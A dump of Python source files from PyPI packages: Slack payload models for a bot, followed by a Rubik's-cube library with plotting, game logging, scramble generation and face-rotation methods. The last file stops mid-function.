authed_users: Optional[list[str]] = Field(
None,
description=(
"An array of string-based User IDs. Each member of the collection "
"represents a user that has installed your application/bot and "
"indicates the described event would be visible to those users."
),
)
event: SlackMessageEventContent
class SlackUser(BaseModel):
"""A model for the user field in Slack interaction payloads."""
id: str = Field(description="ID of the user.")
username: str = Field(description="User name of the user.")
team_id: str = Field(description="The user's team.")
class SlackTeam(BaseModel):
"""A model for the team field in Slack interaction payloads."""
id: str = Field(description="ID of the team.")
domain: str = Field(description="Domain name of the team.")
class SlackChannel(BaseModel):
"""A model for the channel field in Slack interaction payloads."""
id: str = Field(description="ID of the channel.")
name: str = Field(description="Name of the channel.")
class SlackBlockAction(BaseModel):
"""A model for a Slack Block kit interaction.
This isn't yet a full model for a block action payload; experience is
needed to fully understand what the payloads are for the types of
interactions we use.
See https://api.slack.com/reference/interaction-payloads/block-actions
"""
type: str = Field(description="Should be `block_actions`.")
trigger_id: str = Field(
description="A short-lived ID used to launch modals."
)
api_app_id: str = Field(
description=(
"The unique identifier of your installed Slack application. Use "
"this to distinguish which app the event belongs to if you use "
"multiple apps with the same Request URL."
)
)
response_url: str = Field(
description=(
"A short-lived URL to send message in response to interactions."
)
)
user: SlackUser = Field(
description=(
"Information about the user that triggered the interaction."
)
)
team: SlackTeam = Field(description="Information about the Slack team.")
channel: SlackChannel = Field(
description="Information about the Slack channel."
) | /rubin_squarebot-0.7.0-py3-none-any.whl/rubinobs/square/squarebot/models/slack.py | 0.961696 | 0.33846 | slack.py | pypi |
import os
import sys
import json
import warnings
from typing import List, Tuple, Dict
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.axes import Axes
from mpl_toolkits.mplot3d import Axes3D
from itertools import product, combinations
from .cube import Cube
def is_3d_axes(ax : plt.Axes) -> bool:
"""Simply checks if the current object being examined is an instance of the
:class:`matplotlib Axes <matplotlib.axes.Axes>` parameterized to be a 3-D
plotting
Args:
ax (plt.Axes): Object to be tested if it is a
:class:`plt.Axes <matplotlib.axes.Axes>`
Return:
``True`` if object is an instance of
:class:`matplotlib Axes <matplotlib.axes.Axes>` initialized to be a
3-D projection. ``False`` otherwise.
.. code-block::
:name: is_3d_axes
:linenos:
:caption: Tests if the given object ``ax`` is a 3-D projection
or not.
if isinstance(ax, plt.Axes)
and ax.name == '3d':
return True
else:
return False
"""
if isinstance(ax, plt.Axes)\
and ax.name == '3d':
return True
else:
return False
def plot_cube_3D(ax : plt.Axes , cube : Cube):
"""Plots the :class:`Rubix Cube <rubix_cube.cube.Cube>` on an interactive
3-D :class:`matplotlib Axes <matplotlib.axes.Axes>` with non-visible faces
from the current orientation being displayed in visible reflections.
Args:
ax (plt.Axes): The :class:`matplotlib Axes <matplotlib.axes.Axes>`
on which the plotting will be done.
cube (Cube): :class:`Rubix Cube <rubix_cube.cube.Cube>` that will be
plotted in a 3-D projection.
"""
# Ensures arguments are valid
if is_3d_axes(ax)\
and isinstance(cube , Cube)\
and cube.is_well_formed():
# draw cube
r = [-1, 1]
for s, e in combinations(np.array(list(product(r, r, r))), 2):
if np.sum(np.abs(s-e)) == r[1]-r[0]:
ax.plot3D(*zip(s, e), color="b") | /rubix_cube-0.1.9.tar.gz/rubix_cube-0.1.9/rubix_cube/plot_cube_3d.py | 0.743447 | 0.661089 | plot_cube_3d.py | pypi |
from pathlib import Path
from random import randint , randrange
import os
import sys
import json
import warnings
from typing import List, Tuple, Dict
import numpy as np
from .cube import Cube
class Cube_Game(object):
"""Class in charge of directly interacting with and logging changes to
an instance of the :class:`Cube` class.
Attributes:
EVENT_TYPES (List[str]): Description
__game_cube (Cube): :class:`Rubix Cube <Cube>` that is manipulated
throughout game-play.
__game_log (dict): Historical record of all moves, rotations, and other
game events that manipulate the :attr:`game_cube`.
__game_name (str): Name of the game.
__verbose (bool): [DEBUG]-style console output. Default value is
``False``.
"""
#==========================================================================
# CONSTANTS FOR CUBE GAME(s)
#==========================================================================
EVENT_TYPES = ['<<__NEW_GAME__>>',
'F',
'Fi',
'B',
'Bi',
'L',
'Li',
'R',
'Ri',
'U',
'Ui',
'D',
'Di',
'M',
'Mi',
'E',
'Ei',
'S',
'Si',
'X',
'Xi',
'Y',
'Yi',
'Z',
'Zi',
'<<__START_SCRAMBLE__>>',
'<<__END_SCRAMBLE__>>',
'<<__COLOR_CHANGE__>>',
'<<__SAVE_GAME__>>',
'<<__LOAD_GAME__>>',
'<<__PAUSE_GAME__>>',
'<<__RESUME_GAME__>>',
'<<__SOLVE_CUBE__>>',
'<<__QUIT_GAME__>>']
CUBE_FUNCS = {'U' : Cube.move_up,
'Ui' : Cube.move_up_inverse,
'D' : Cube.move_down,
'Di' : Cube.move_down_inverse,
'L' : Cube.move_left,
'Li' : Cube.move_left_inverse,
'R' : Cube.move_right,
'Ri' : Cube.move_right_inverse,
'F' : Cube.move_front,
'Fi' : Cube.move_front_inverse,
'B' : Cube.move_back,
'Bi' : Cube.move_back_inverse,
'M' : Cube.move_middle,
'Mi' : Cube.move_middle_inverse,
'E' : Cube.move_equator,
'Ei' : Cube.move_equator_inverse,
'S' : Cube.move_standing,
'Si' : Cube.move_standing_inverse,
'X' : Cube.rotate_pitch,
'Xi' : Cube.rotate_pitch_inverse,
'Y' : Cube.rotate_yaw,
'Yi' : Cube.rotate_yaw_inverse,
'Z' : Cube.rotate_roll,
'Zi' : Cube.rotate_roll_inverse}
INVERSE_FUNCS = {'U' : 'Ui',
'Ui' : 'U',
'D' : 'Di',
'Di' : 'D',
'L' : 'Li',
'Li' : 'L',
'R' : 'Ri',
'Ri' : 'R',
'F' : 'Fi',
'Fi' : 'F',
'B' : 'Bi',
'Bi' : 'B',
'M' : 'Mi',
'Mi' : 'M',
'E' : 'Ei',
'Ei' : 'E',
'S' : 'Si',
'Si' : 'S',
'X' : 'Xi',
'Xi' : 'X',
'Y' : 'Yi',
'Yi' : 'Y',
'Z' : 'Zi',
'Zi' : 'Z'}
#==========================================================================
# CLASS CONSTRUCTOR
#==========================================================================
def __init__(self,
cube : Cube = None,
game_name : str = None,
game_log : Dict = None,
scramble : bool = False,
verbose : bool = False):
""":class:`Cube_Game` class constructor
Args:
cube (Cube, optional): :class:`Cube` that will be directly
manipulated throughout gameplay.
game_name (str, optional): Name of the current game being played.
game_log (Dict, optional): Dictionary that contains a history of
moves and other game events.
scramble (bool, optional): Whether or not the game should scramble
the :attr:`__game_cube` upon initialization. Default value is
``False``.
verbose (bool, optional): [DEBUG]-style console output. Default
value is ``False``.
"""
# Sets Up Default Game
self.game_name = 'Untitled_Cube_Game'
self.game_name = game_name
self.game_cube = Cube()
self.game_log = {'events' : [{'type' : '<<__NEW_GAME__>>',
'name' : self.game_name}]}
# Attempts to reset property values with argument values.
self.game_cube = cube
self.game_log = game_log
self.verbose = verbose
# Initializes a default cube
if self.game_cube == Cube():
if self.verbose:
print(f"\n[DEBUG]\tNew DEFAULT Cube created for game : '{self.game_name}'\n")
# Initializes a default game log
if self.game_log != game_log:
if self.verbose:
print(f"\n[DEBUG]\tNew DEFAULT ``game_log`` created for game : '{self.game_name}'\n")
else:
self.game_log['events'].append({'type' : '<<__NEW_GAME__>>',
'name' : self.game_name})
if self.verbose:
print(f"\n[DEBUG]\tNew game created with name : '{self.game_name}'\n")
#==========================================================================
# PROPERTY INTERFACE(s)
#==========================================================================
@property
def game_cube(self) -> Cube:
""":class:`Rubix Cube <Cube>` object being manipulated in game.
"""
return self.__game_cube
@game_cube.setter
def game_cube(self , cube : Cube):
if isinstance(cube, Cube)\
and cube.is_well_formed():
self.__game_cube = cube
@property
def game_name(self) -> str:
"""Name of the Game
"""
return self.__game_name
@game_name.setter
def game_name(self, name : str):
if isinstance(name, str)\
and len(name) > 0:
self.__game_name = name
@property
def game_log(self) -> Dict:
"""JSON-style :class:`dict` recording all actions done to
the :attr:`game_cube` stored under the ``events`` key which is a list
of :class`dict` objects each of which has a ``type`` key with a value
found in :attr:`EVENT_TYPES`.
.. code-block::
:name: game_log_EVENT_TYPES
:linenos:
:caption: Potential values of ``type`` in :attr:`game_log`.
EVENT_TYPES = ['<<__NEW_GAME__>>',
'F',
'Fi',
'B',
'Bi',
'L',
'Li',
'R',
'Ri',
'U',
'Ui',
'D',
'Di',
'M',
'Mi',
'E',
'Ei',
'S',
'Si',
'X',
'Xi',
'Y',
'Yi',
'Z',
'Zi',
'<<__START_SCRAMBLE__>>',
'<<__END_SCRAMBLE__>>',
'<<__COLOR_CHANGE__>>',
'<<__SAVE_GAME__>>',
'<<__LOAD_GAME__>>',
'<<__PAUSE_GAME__>>',
'<<__RESUME_GAME__>>',
'<<__SOLVE_CUBE__>>',
'<<__QUIT_GAME__>>']
.. code-block::
:name: game_log
:linenos:
:caption: Required ``game_log`` dictionary keys.
game_log = {'events' : [{'type' : '<<__NEW_GAME__>>',
'name' : '...'},
{'type' : ...},
...,
{'type' : ...}]}
"""
return self.__game_log
@game_log.setter
def game_log(self, game_log : Dict):
if isinstance(game_log, dict)\
and 'events' in game_log\
and isinstance(game_log['events'], list)\
and len(game_log['events']) > 0\
and all([isinstance(event, dict) for event in game_log['events']]):
# Has to ensure that all event types are valid
valid_log = all(['type' in event\
and event['type'] in Cube_Game.EVENT_TYPES\
for event in game_log['events']])
if valid_log:
self.__game_log = game_log
@property
def verbose(self) -> bool:
"""[DEBUG]-style console output. Default value is ``False``.
"""
return self.__verbose
@verbose.setter
def verbose(self, verbose : bool):
if isinstance(verbose, bool):
self.__verbose = verbose
else:
self.__verbose = False
#==========================================================================
# GAME-PLAY METHOD(s)
#==========================================================================
def manipulate_cube(self, cube_func : str):
"""Function that interfaces the :class:`Cube_Game` class with the
:class:`Cube` class to turn the layers or rotate the orientation.
Args:
cube_func (str): Look-up key to recover the proper :class:`Cube`
method to call from :attr:`CUBE_FUNCS` class attribute to call
a move using the :attr:`game_cube`.
.. code-block::
:name: move_cube_CUBE_FUNCS
:linenos:
:caption: Parameter ``cube_func`` will determine which
:attr:`game_cube` move function is called. If not found,
nothing happens.
CUBE_FUNCS = {'U' : Cube.move_up,
'Ui' : Cube.move_up_inverse,
'D' : Cube.move_down,
'Di' : Cube.move_down_inverse,
'L' : Cube.move_left,
'Li' : Cube.move_left_inverse,
'R' : Cube.move_right,
'Ri' : Cube.move_right_inverse,
'F' : Cube.move_front,
'Fi' : Cube.move_front_inverse,
'B' : Cube.move_back,
'Bi' : Cube.move_back_inverse,
'M' : Cube.move_middle,
'Mi' : Cube.move_middle_inverse,
'E' : Cube.move_equator,
'Ei' : Cube.move_equator_inverse,
'S' : Cube.move_standing,
'Si' : Cube.move_standing_inverse,
'X' : Cube.rotate_pitch,
'Xi' : Cube.rotate_pitch_inverse,
'Y' : Cube.rotate_yaw,
'Yi' : Cube.rotate_yaw_inverse,
'Z' : Cube.rotate_roll,
'Zi' : Cube.rotate_roll_inverse}
"""
if cube_func in Cube_Game.CUBE_FUNCS\
and self.game_cube.is_well_formed():
# Performs the desired cube move on the game cube
Cube_Game.CUBE_FUNCS[cube_func](self.game_cube)
if self.verbose:
print(f"[DEBUG]\tCalling game cube function: '{cube_func}'")
print(f"\t\tNum Matching Adjacent Tiles : {self.game_cube.get_num_matching_adjacent_tiles()}")
self.game_log['events'].append({'type' : cube_func})
def get_scramble_sequence(n_steps : int = 50,
cube_funcs : List[str] = None) -> List[str]:
"""Compiles a sequence of moves for scrambling the :attr:`game_cube`
attribute for applying a sequence of ``n_steps`` semi-randomly selected
cube manipulations using a defined a provided sub-set of cube functions
``cube_funcs``.
Args:
n_steps (int, optional): The number of :class:`Rubix Cube <Cube>`
manipulations to be applied to the :attr:`game_cube`.
Note:
Valid range of values, 0 < ``n_steps`` <= 500. Won't
call any :class:`Cube` function(s) if not in range.
cube_funcs (List[str], optional): Sub-list of :attr:`CUBE_FUNCS`
that defines the options for manipulating the cube. Default
value is ``None`` which allows all functions in
:attr:`CUBE_FUNCS` to be selected.
Returns:
List[str]: **sequence** - A list of cube manipulation function
str(s) for use with :func:`manipulate_cube` function.
Note:
Won't perform the following sequences:
* ``<<ACTION>>`` , ``<<ACTION_INVERSE>>``
* ``<<ACTION>>``, ``<<ACTION>>``, ``<<ACTION>>``, ``<<ACTION>>``
.. code-block::
:name: scramble_cube_INVERSE_FUNCS
:linenos:
:caption: :class:`Cube_Game` static :attr:`INVERSE_FUNCS` attribute
for looking up the inverse function for each potential cube
manipulation.
INVERSE_FUNCS = {'U' : 'Ui',
'Ui' : 'U',
'D' : 'Di',
'Di' : 'D',
'L' : 'Li',
'Li' : 'L',
'R' : 'Ri',
'Ri' : 'R',
'F' : 'Fi',
'Fi' : 'F',
'B' : 'Bi',
'Bi' : 'B',
'M' : 'Mi',
'Mi' : 'M',
'E' : 'Ei',
'Ei' : 'E',
'S' : 'Si',
'Si' : 'S',
'X' : 'Xi',
'Xi' : 'X',
'Y' : 'Yi',
'Yi' : 'Y',
'Z' : 'Zi',
'Zi' : 'Z'}
"""
# Default length for sequence of random moves to be generated
if not isinstance(n_steps, int)\
or not (n_steps > 0 and n_steps <= 500):
n_steps = 0
# Default list of cube functions is all of them
if not isinstance(cube_funcs , list)\
or not all([func in Cube_Game.CUBE_FUNCS for func in cube_funcs]):
cube_funcs = list(Cube_Game.CUBE_FUNCS.keys())
sequence = []
while len(sequence) < n_steps:
# Generates a random choice from the current options
# of potential cube-functions to call
choice_func = cube_funcs[randrange(len(cube_funcs))]
if len(sequence) == 0:
sequence.append(choice_func)
else:
last_func = sequence[-1]
# No <<FUNCTION>> , <<INVERSE_FUNCTION>> sub-sequences
if last_func == Cube_Game.INVERSE_FUNCS[choice_func]:
continue
if len(sequence) > 2:
last_three = sequence[-3:]
# No 4 of the same function in a row
if all([func == choice_func for func in last_three]):
continue
sequence.append(choice_func)
return sequence
def compute_inverse_log_sequence(self) -> List[str]:
"""Computes the inverse sequence of moves from the :attr:`game_log`
that ``SHOULD`` lead to the :class:`Rubix Cube <rubix_cube.cube.Cube>`
being solved!
Returns:
List[str]: **sequence** - A list of cube manipulation function
str(s) for use with :func:`manipulate_cube` function.
"""
# Ensures the game is valid
if self.game_cube.is_well_formed()\
and isinstance(self.game_log, dict)\
and 'events' in self.game_log:
# Gets a reversed list of all log event types
event_types = [event['type'] for event in\
np.flip(self.game_log['events'])]
# Filters down to cube-moves only
log_moves = list(filter(lambda e_type: e_type in\
Cube_Game.INVERSE_FUNCS,
event_types))
# Computes the inverse sequence
sequence = [Cube_Game.INVERSE_FUNCS[mv] for mv in log_moves]
return sequence | /rubix_cube-0.1.9.tar.gz/rubix_cube-0.1.9/rubix_cube/cube_game.py | 0.601945 | 0.195287 | cube_game.py | pypi |
import os
import sys
import json
import copy
import warnings
from typing import List, Tuple, Dict
import numpy as np
from matplotlib.colors import is_color_like
class Cube(object):
"""Data structure for representing a 3x3x3 rubix-cube.
Attributes:
__colors (Dict[str,str]): Dictionary of HEX colors that define the
rendering of the :class:`Cube`'s tile coloring.
__faces (Dict[str,np.ndarray]): Dictionary of
:class:`numpy arrays <numpy.ndarray>` that define the rendering of
the :class:`Cube`'s tile configuration.
"""
#==========================================================================
# CLASS CONSTRUCTOR
#==========================================================================
def __init__(self,
colors : Dict[str,str] = None,
faces : Dict[str,np.array] = None):
""":class:`Cube` class constructor.
Args:
colors (Dict[str,str], optional): Dictionary of color HEX strings.
Default value is ``None`` which will create a cube with default
colors :attr:`DEFAULT_FACE_COLORS`.
.. code-block::
:name: init_colors_keys
:linenos:
:caption: Required ``colors`` dictionary keys.
colors = {'UP_COLOR' : ...,
'DOWN_COLOR' : ...,
'FRONT_COLOR' : ...,
'BACK_COLOR' : ...,
'LEFT_COLOR' : ...,
'RIGHT_COLOR' : ...
}
All colors passed as values must return ``True`` when examined
by :func:`matplotlib.colors.is_color_like`.
faces (Dict[str,np.array], optional): Dictionary of face names to
3x3 arrays of the the tile face values. Default value is
``None`` which will create a solved cube with default colors.
.. code-block::
:name: init_faces_keys
:linenos:
:caption: Required ``faces`` dictionary keys.
faces = {'UP_FACE' : ...,
'DOWN_FACE' : ...,
'FRONT_FACE' : ...,
'BACK_FACE' : ...,
'LEFT_FACE' : ...,
'RIGHT_FACE' : ...
}
All faces passed as value must be 3x3
:class:`numpy arrays <numpy.ndarray>` with each element
returning ``True`` when examined by
:func:`matplotlib.colors.is_color_like`.
"""
# Sets private attributes via properties
self.colors = Cube.DEFAULT_FACE_COLORS
self.faces = Cube.DEFAULT_FACES
if isinstance(colors, dict):
self.colors = colors
if isinstance(faces, dict):
self.faces = faces
#==========================================================================
# OVERLOADED OPERATOR(s)
#==========================================================================
def __eq__(self, other) -> bool:
"""Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
exactly identical between the two objects.
Args:
other (TYPE): Description
Returns:
bool: Description
"""
if self.is_well_formed()\
and isinstance(other , self.__class__)\
and other.is_well_formed():
for face , other_face in zip(self.faces , other.faces):
if not np.array_equal(self.faces[face],other.faces[other_face]):
return False
return True
else:
return False
def __ne__(self, other) -> bool:
"""Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
``NOT`` exactly identical between the two objects.
Args:
other (TYPE): Description
Returns:
bool: Description
"""
return not (self == other)
def __mod__(self, other) -> bool:
"""Tests if the :class:`Rubix Cube <rubix_cube.cube.Cube>` faces are
exactly identical between the two objects after re-orientation.
Essentially are the cubes identical after rotation?
Args:
other (TYPE): Description
Returns:
bool:
"""
return self.is_equivalent_to(other)
def is_equivalent_to(self, other) -> bool:
"""
Args:
other (TYPE): Description
Returns:
bool:
"""
if self.is_well_formed()\
and isinstance(other , self.__class__)\
and other.is_well_formed():
other_test_seqs = [[Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll],
[Cube.rotate_yaw,
Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll],
[Cube.rotate_yaw,
Cube.rotate_yaw,
Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll],
[Cube.rotate_yaw_inverse,
Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll],
[Cube.rotate_pitch,
Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll],
[Cube.rotate_pitch_inverse,
Cube.rotate_roll,
Cube.rotate_roll,
Cube.rotate_roll]]
# Tests if exact match
if self.__eq__(other):
return True
# Tests the 24 sequences of re-orientations for exact matches
for seq in other_test_seqs:
# Makes a local copy to manipulate
l_other = copy.deepcopy(other)
# Performs each move
for mv in seq:
mv(l_other)
# Tests for exact match
if self.__eq__(l_other):
return True
return False
#==========================================================================
# PROPERTY INTERFACE(s)
#==========================================================================
@property
def colors(self):
"""Can only be set to be a dictionary with 6 unique color string values
that all return ``True`` when examined by
:func:`matplotlib.colors.is_color_like`.
.. code-block::
:name: colors_keys
:linenos:
:caption: Required ``colors`` dictionary keys.
colors = {'UP_COLOR' : ...,
'DOWN_COLOR' : ...,
'FRONT_COLOR' : ...,
'BACK_COLOR' : ...,
'LEFT_COLOR' : ...,
'RIGHT_COLOR' : ...
}
"""
return self.__colors
@colors.setter
def colors(self, colors : Dict[str,str]):
required_keys = ['UP_COLOR',
'DOWN_COLOR',
'FRONT_COLOR',
'BACK_COLOR',
'LEFT_COLOR',
'RIGHT_COLOR']
if isinstance(colors, dict)\
and all([key in colors for key in required_keys]):
set_colors = np.array([colors[key] for key in required_keys])
if all([is_color_like(color) for color in set_colors]):
self.__colors = dict(zip(required_keys , set_colors))
@property
def faces(self) -> Dict[str,np.ndarray]:
"""Can only be set to be a dictionary of 6 strings mapped to the faces
of a Rubix Cube. Each value must be a 3x3
:class:`numpy array <numpy.ndarray>` of values all of which are valid
colors that can be found within the :attr:`colors` attribute.
.. code-block::
:name: faces_keys
:linenos:
:caption: Required ``faces`` dictionary keys.
faces = {'UP_FACE' : ...,
'DOWN_FACE' : ...,
'FRONT_FACE' : ...,
'BACK_FACE' : ...,
'LEFT_FACE' : ...,
'RIGHT_FACE' : ...
}
"""
return self.__faces
@faces.setter
def faces(self, faces : Dict[str,np.ndarray]):
required_keys = ['UP_FACE',
'DOWN_FACE',
'FRONT_FACE',
'BACK_FACE',
'LEFT_FACE',
'RIGHT_FACE']
if isinstance(faces, dict)\
and all([key in faces for key in required_keys]):
set_faces = np.array([faces[key] for key in required_keys])
if all([self.is_valid_face(face) for face in set_faces]):
self.__faces = dict(zip(required_keys , set_faces))
#==========================================================================
# QUALITY ASSURANCE METHOD(s)
#==========================================================================
def is_well_formed(self) -> bool:
"""Quality control method to ensure class has been properly
initialized by examining all :attr:`faces` via the quality control
method :func:`is_valid_face`.
Returns:
``True`` if all faces are 3 x 3 arrays of valid colors
as defined by :func:`matplotlib.colors.is_color_like`,
``False`` otherwise.
"""
required_keys = ['UP_FACE',
'DOWN_FACE',
'FRONT_FACE',
'BACK_FACE',
'LEFT_FACE',
'RIGHT_FACE']
try:
return all([self.is_valid_face(self.faces[face])
for face in required_keys])
except KeyError:
return False
def is_valid_face(self, face : np.ndarray) -> bool:
"""Checks if the provided array could be a valid face on the
currently initialized :class:`Cube`.
Args:
face (np.ndarray): Array to be tested for being valid in the
context of the current :class:`Cube`.
Returns:
``True`` if faces is 3 x 3 array of valid colors as defined by
current instance's :attr:`colors` attribute, ``False`` otherwise.
"""
if isinstance(face, np.ndarray)\
and face.shape == (3,3)\
and all([all([val in self.colors.values()
for val in row])
for row in face]):
return True
else:
return False
#==========================================================================
# SOLUTION CHECKING METHOD(s)
#==========================================================================
def is_solved_face(self, face: np.ndarray) -> bool:
"""Checks if the provided array could be a valid face on the
currently initialized :class:`Cube`.
Args:
face (np.ndarray): Array to be tested for being solved in the
context of the current :class:`Cube`.
Returns:
``True`` if faces is solved 3 x 3 array of valid colors as defined
by current instance's :attr:`colors` attribute, ``False``
otherwise.
.. code-block::
:name: is_solved_face
:linenos:
:caption: A solved ``face`` returns ``True`` when examined by
:func:`is_valid_face` and only contains 1 unique value.
return len(np.unique(face) == 1)
"""
if not self.is_valid_face(face):
return False
else:
return len(np.unique(face)) == 1
def get_num_solved_faces(self) -> int:
"""Counts the number of solved faces by examining each one using
:func:`is_solved_face` if the currently initialized :class:`Cube`
:func:`is_well_formed`, 0 otherwise.
Returns:
int: **num_faces_solved** - The number of solved faces on the
currently initialized :class:`Cube`.
"""
num_faces_solved = 0
if self.is_well_formed():
for face in self.faces.values():
if self.is_solved_face(face):
num_faces_solved += 1
return num_faces_solved
def is_solved(self) -> bool:
"""Calls :func:`get_num_solved_faces` to check if all faces of the
:class:`Cube` are solved.
Returns:
bool: Value representing if all faces
are solved completely.
.. code-block::
:name: is_solved
:linenos:
:caption: Checks to see if the number of solved faces is 6.
return (self.get_num_solved_faces() == 6)
"""
return (self.get_num_solved_faces() == 6)
def get_num_matching_adjacent_tiles_face(self, face : np.ndarray) -> int:
"""Counts the number of tiles on the current face that are adjacent
and have the same color values.
Args:
face (np.ndarray): Array to be tested for being solved in the
context of the current :class:`Cube`.
Returns:
int: **num_match_adj_tiles** - The number of tiles on the given
``face`` that are adjacent (same row XOR same column) and have
the same color valus.
"""
# Ensures dealing with valid face
if self.is_valid_face(face):
num_match_adj_tiles = 0
# Iterates over each tile in the cube
for r_idx , row in enumerate(face):
for c_idx , col in enumerate(row):
neighbors = list()
if r_idx > 0:
neighbors.append(face[r_idx - 1, c_idx]) # Tile above
if r_idx < 2:
neighbors.append(face[r_idx + 1, c_idx]) # Tile below
if c_idx > 0:
neighbors.append(face[r_idx, c_idx - 1]) # Tile left
if c_idx < 2:
neighbors.append(face[r_idx, c_idx + 1]) # Tile right
if any([face[r_idx, c_idx] == c for c in neighbors]):
num_match_adj_tiles += 1
return num_match_adj_tiles
def get_num_matching_adjacent_tiles(self) -> int:
"""Counts the number of tiles on the :class:`Cube` that are adjacent
and have the same color values. Uses successive calls to
:func:`get_num_matching_adjacent_tiles_face` for every face.
Returns:
int: **num_match_adj_tiles** - The number of tiles on the given
:class:`Cube` that are adjacent (same row XOR same column) and have
the same color valus.
"""
num_match_adj_tiles = 0
if self.is_well_formed():
for face in self.faces.values():
if self.is_valid_face(face):
num_match_adj_tiles += self.get_num_matching_adjacent_tiles_face(face)
return num_match_adj_tiles
#==========================================================================
# MOVE METHOD(s)
#==========================================================================
def move_up(self):
"""Up Move
"""
if self.is_well_formed():
self.faces['UP_FACE'] = np.rot90(self.faces['UP_FACE'],
axes=(1,0))
temp = self.faces['BACK_FACE'][0,:].copy()
self.faces['BACK_FACE'][0,:] = self.faces['LEFT_FACE'][0,:]
self.faces['LEFT_FACE'][0,:] = self.faces['FRONT_FACE'][0,:]
self.faces['FRONT_FACE'][0,:] = self.faces['RIGHT_FACE'][0,:]
self.faces['RIGHT_FACE'][0,:] = temp
def move_up_inverse(self):
"""Up Inverse Move
"""
if self.is_well_formed():
self.faces['UP_FACE'] = np.rot90(self.faces['UP_FACE'])
temp = self.faces['BACK_FACE'][0,:].copy()
self.faces['BACK_FACE'][0,:] = self.faces['RIGHT_FACE'][0,:]
self.faces['RIGHT_FACE'][0,:] = self.faces['FRONT_FACE'][0,:]
self.faces['FRONT_FACE'][0,:] = self.faces['LEFT_FACE'][0,:]
self.faces['LEFT_FACE'][0,:] = temp
def move_down(self):
"""Down Move
"""
if self.is_well_formed():
self.faces['DOWN_FACE'] = np.rot90(self.faces['DOWN_FACE'])
temp = self.faces['FRONT_FACE'][2,:].copy()
self.faces['FRONT_FACE'][2,:] = self.faces['LEFT_FACE'][2,:]
self.faces['LEFT_FACE'][2,:] = self.faces['BACK_FACE'][2,:]
self.faces['BACK_FACE'][2,:] = self.faces['RIGHT_FACE'][2,:]
self.faces['RIGHT_FACE'][2,:] = temp
def move_down_inverse(self):
"""Down Inverse Move
"""
if self.is_well_formed():
self.faces['DOWN_FACE'] = np.rot90(self.faces['DOWN_FACE'],
axes=(1,0))
temp = self.faces['FRONT_FACE'][2,:].copy()
self.faces['FRONT_FACE'][2,:] = self.faces['RIGHT_FACE'][2,:]
self.faces['RIGHT_FACE'][2,:] = self.faces['BACK_FACE'][2,:]
self.faces['BACK_FACE'][2,:] = self.faces['LEFT_FACE'][2,:]
self.faces['LEFT_FACE'][2,:] = temp
def move_front(self):
"""Front Move
"""
if self.is_well_formed():
self.faces['FRONT_FACE'] = np.rot90(self.faces['FRONT_FACE'],
axes=(1,0))
temp = self.faces['UP_FACE'][2,:].copy()
self.faces['UP_FACE'][2,:] = np.flip(self.faces['LEFT_FACE'][:,2])
self.faces['LEFT_FACE'][:,2] = self.faces['DOWN_FACE'][0,:]
self.faces['DOWN_FACE'][0,:] = np.flip(self.faces['RIGHT_FACE'][:,0])
self.faces['RIGHT_FACE'][:,0] = temp
def move_front_inverse(self):
"""Front Inverse Move
"""
if self.is_well_formed():
self.faces['FRONT_FACE'] = np.rot90(self.faces['FRONT_FACE'])
temp = self.faces['UP_FACE'][2,:].copy()
self.faces['UP_FACE'][2,:] = self.faces['RIGHT_FACE'][:,0]
self.faces['RIGHT_FACE'][:,0] = np.flip(self.faces['DOWN_FACE'][0,:])
self.faces['DOWN_FACE'][0,:] = self.faces['LEFT_FACE'][:,2]
self.faces['LEFT_FACE'][:,2] = np.flip(temp)
def move_back(self):
"""Back Move
"""
if self.is_well_formed():
self.faces['BACK_FACE'] = np.rot90(self.faces['BACK_FACE'],
axes=(1,0))
temp = self.faces['DOWN_FACE'][2,:].copy()
self.faces['DOWN_FACE'][2,:] = self.faces['LEFT_FACE'][:,0]
self.faces['LEFT_FACE'][:,0] = np.flip(self.faces['UP_FACE'][0,:])
self.faces['UP_FACE'][0,:] = self.faces['RIGHT_FACE'][:,2]
self.faces['RIGHT_FACE'][:,2] = np.flip(temp)
def move_back_inverse(self):
"""Back Inverse Move
"""
if self.is_well_formed():
self.faces['BACK_FACE'] = np.rot90(self.faces['BACK_FACE'])
temp = self.faces['DOWN_FACE'][2,:].copy()
self.faces['DOWN_FACE'][2,:] = np.flip(self.faces['RIGHT_FACE'][:,2])
self.faces['RIGHT_FACE'][:,2] = self.faces['UP_FACE'][0,:]
self.faces['UP_FACE'][0,:] = np.flip(self.faces['LEFT_FACE'][:,0])
self.faces['LEFT_FACE'][:,0] = temp
def move_left(self):
"""Left Move
"""
if self.is_well_formed():
self.faces['LEFT_FACE'] = np.rot90(self.faces['LEFT_FACE'],
axes=(1,0))
temp = self.faces['DOWN_FACE'][:,0].copy()
self.faces['DOWN_FACE'][:,0] = self.faces['FRONT_FACE'][:,0]
self.faces['FRONT_FACE'][:,0] = self.faces['UP_FACE'][:,0]
self.faces['UP_FACE'][:,0] = np.flip(self.faces['BACK_FACE'][:,2])
self.faces['BACK_FACE'][:,2] = np.flip(temp)
def move_left_inverse(self):
"""Left Inverse Move
"""
if self.is_well_formed():
self.faces['LEFT_FACE'] = np.rot90(self.faces['LEFT_FACE'])
temp = self.faces['DOWN_FACE'][:,0].copy()
self.faces['DOWN_FACE'][:,0] = np.flip(self.faces['BACK_FACE'][:,2])
self.faces['BACK_FACE'][:,2] = np.flip(self.faces['UP_FACE'][:,0])
self.faces['UP_FACE'][:,0] = self.faces['FRONT_FACE'][:,0]
self.faces['FRONT_FACE'][:,0] = temp
def move_right(self):
"""Right Move
"""
if self.is_well_formed():
self.faces['RIGHT_FACE'] = np.rot90(self.faces['RIGHT_FACE'],
axes=(1,0))
temp = self.faces['UP_FACE'][:,2].copy()
self.faces['UP_FACE'][:,2] = self.faces['FRONT_FACE'][:,2]
self.faces['FRONT_FACE'][:,2] = self.faces['DOWN_FACE'][:,2]
self.faces['DOWN_FACE'][:,2] = np.flip(self.faces['BACK_FACE'][:,0])
self.faces['BACK_FACE'][:,0] = np.flip(temp)
def move_right_inverse(self):
"""Right Inverse Move
"""
if self.is_well_formed():
